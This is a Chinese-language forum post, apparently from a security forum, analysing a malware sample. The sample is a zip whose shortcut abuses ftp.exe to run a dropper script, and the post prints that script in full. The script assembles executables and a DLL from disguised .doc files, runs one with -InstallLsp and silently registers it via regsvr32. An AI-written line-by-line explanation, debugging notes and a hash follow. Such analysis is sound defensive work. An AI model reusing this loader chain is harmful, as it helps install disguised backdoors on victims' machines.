[font=-apple-system, BlinkMacSystemFont, "]样本是一个压缩包
[font=-apple-system, BlinkMacSystemFont, "][font=-apple-system, BlinkMacSystemFont, "]其中文件夹是隐藏格式,另一个是一个快捷方式
[font=-apple-system, BlinkMacSystemFont, "][font=-apple-system, BlinkMacSystemFont, "]指向路径为 C:WindowsSystem32ftp.exe -s"":_/_/_/_/_/_/_/_/_[font=-apple-system, BlinkMacSystemFont, "]这个的作用是执行一个恶意的脚本文件_[font=-apple-system, BlinkMacSystemFont, "]内容如下:[Visual Basic]
纯文本查看 复制代码?[tr=none]
01
02
03
04
05
06
07
08
09
10
11
12
!call copy /Y "________doc*.*" "_" >nul!call start /max explorer _!call mkdir C:UsersPublicUpdate >nul!call copy /Y _________relsheader.doc C:UsersPublicUpdateheader >nul!call copy /Y _________relssc.doc C:UsersPublicUpdatesc >nul!call copy /Y _________rels%TIME:~4,1%.doc C:UsersPublicUpdateshell32 >nul!call echo %RANDOM%>>C:UsersPublicUpdateshell32 >nul!call copy /Y /b C:UsersPublicUpdateheader+C:UsersPublicUpdateshell32 C:UsersPublicUpdate360.%TIME:~4,1% >nul!call copy /Y /b C:UsersPublicUpdateheader+_________relsWindowsSecurity.doc C:UsersPublicUpdate%TIME:~3,1%.exe >nul!call start C:UsersPublicUpdate%TIME:~3,1%.exe -InstallLsp C:UsersPublicUpdate360.%TIME:~4,1% >nul!IF NOT EXIST C:UsersPublicWinVer.dll (copy /Y /b _________relsheader.doc+_________relsWinVer.doc C:UsersPublicWinVer.dll && regsvr32 /s C:UsersPublicWinVer.dll)quit
[font=-apple-system, BlinkMacSystemFont, "]找ai解释一下:这个脚本是一个 Windows 批处理(Batch)脚本,其中包含了一些可疑的、甚至可能是恶意的行为。它使用了混淆路径(如 ____)和
系统环境变量(如 %TIME% 和 %RANDOM%),目的是隐藏真实意图。下面我们逐行分析并解释其行为,并指出潜在的
安全风险。
🔍 脚本逐行解析 复制代码 隐藏代码!call copy /Y "________doc*.*" "_" >nul
- 解释:将 _ 目录下的 doc 文件夹中所有文件复制到根 _ 目录下,覆盖已有文件。
- >nul 表示不输出结果(静默执行)。
- !call 可能是伪装或错误写法,正常应为 call。
- 可疑点:路径 ____... 是明显人为构造的混淆路径,可能用于绕过检测。
复制代码 隐藏代码!call start /max explorer _
- 解释:打开资源管理器,定位到名为 _ 的目录,并最大化窗口。
- 用途推测:可能是为了引导用户查看某个文件或制造干扰。
复制代码 隐藏代码!call mkdir C:UsersPublicUpdate >nul
- 解释:在公共用户目录下创建一个名为 Update 的文件夹。
- 常见位置:C:UsersPublic 是所有用户可访问的目录,常被恶意软件用来存放持久化文件。
复制代码 隐藏代码!call copy /Y _________relsheader.doc C:UsersPublicUpdateheader >nul
- 解释:复制一个名为 header.doc 的文件到 Update 文件夹并重命名为 header(无扩展名)。
- 注意:.doc 不一定是 Word 文档,可能是伪装的可执行内容。
复制代码 隐藏代码!call copy /Y _________relssc.doc C:UsersPublicUpdatesc >nul
- 类似上一条,复制 sc.doc 为 sc(无扩展名)。
- 可能是某个 payload 或 shellcode 的片段。
复制代码 隐藏代码!call copy /Y _________rels%TIME:~4,1%.doc C:UsersPublicUpdateshell32 >nul
- 解释:根据当前时间的第5个字符(如 :30.50 中的 3)选择一个文件(如 3.doc)复制为 shell32(无扩展名)。
- 动态性:利用 %TIME% 提取单个字符作为文件名,可能是为了反分析或触发特定逻辑。
复制代码 隐藏代码!call echo %RANDOM%>>C:UsersPublicUpdateshell32 >nul
- 解释:向 shell32 文件末尾追加一个随机数。
- 目的:修改文件内容,可能用于生成密钥、混淆、或破坏签名验证。
复制代码 隐藏代码!call copy /Y /b C:UsersPublicUpdateheader+C:UsersPublicUpdateshell32 C:UsersPublicUpdate360.%TIME:~4,1% >nul
- 解释:以二进制模式(/b)合并 header 和 shell32 文件,生成一个新文件 360.X(X 是时间中的某个数字)。
- 推测用途:拼接出一个可执行 payload,360 可能模仿“360安全卫士”进行伪装。
复制代码 隐藏代码!call copy /Y /b C:UsersPublicUpdateheader+_________relsWindowsSecurity.doc C:UsersPublicUpdate%TIME:~3,1%.exe >nul
- 解释:合并 header 和 WindowsSecurity.doc,生成一个 .exe 文件,名字由时间第4个字符决定(如 : 或数字)。
- 严重警告:这是在创建一个可执行程序,名字伪装成与“Windows 安全”相关,具有社会工程学欺骗性。
复制代码 隐藏代码!call start C:UsersPublicUpdate%TIME:~3,1%.exe -InstallLsp C:UsersPublicUpdate360.%TIME:~4,1% >nul
- 解释:运行上一步生成的 .exe 文件,传入参数 -InstallLsp 和另一个拼接出的文件路径。
复制代码 隐藏代码!IF NOT EXIST C:UsersPublicWinVer.dll ( copy /Y /b _________relsheader.doc+_________relsWinVer.doc C:UsersPublicWinVer.dll && regsvr32 /s C:UsersPublicWinVer.dll)
- 解释:如果 WinVer.dll 不存在,则:
合并两个 .doc 文件生成 WinVer.dll
- 使用 regsvr32 静默注册该 DLL(即加载并执行其代码)
- 高危行为:regsvr32.exe 是合法系统工具,但常被用于 无文件攻击(fileless attack)
- .dll 被注册后可能实现持久化、提权或后门功能
- 名称 WinVer.dll 伪装成系统文件(真实 winver.exe 是版本查看器)
复制代码 隐藏代码quit
- 解释:退出脚本(但 quit 不是标准 batch 命令;应为 exit)
- 可能只是结束标记。
[font=-apple-system, BlinkMacSystemFont, "]最终在update目录下生成的文件
[font=-apple-system, BlinkMacSystemFont, "][font=-apple-system, BlinkMacSystemFont, "]通过x64dbg进行调试,需要按照脚本里面的方式更改命令行[font=-apple-system, BlinkMacSystemFont, "]"<实际路径>Update2.exe" -InstallLsp "<实际路径>Update360.2"[font=-apple-system, BlinkMacSystemFont, "]最终是解密出一个shellcode
[font=-apple-system, BlinkMacSystemFont, "][font=-apple-system, BlinkMacSystemFont, "]然后外联恶意ip,但是因为这个ip已经关闭了端口,所以没办法继续分析了
[font=-apple-system, BlinkMacSystemFont, "][font=-apple-system, BlinkMacSystemFont, "]压缩包sha1:5A735BD3402052CB80124CB855503E7DEF6AD696
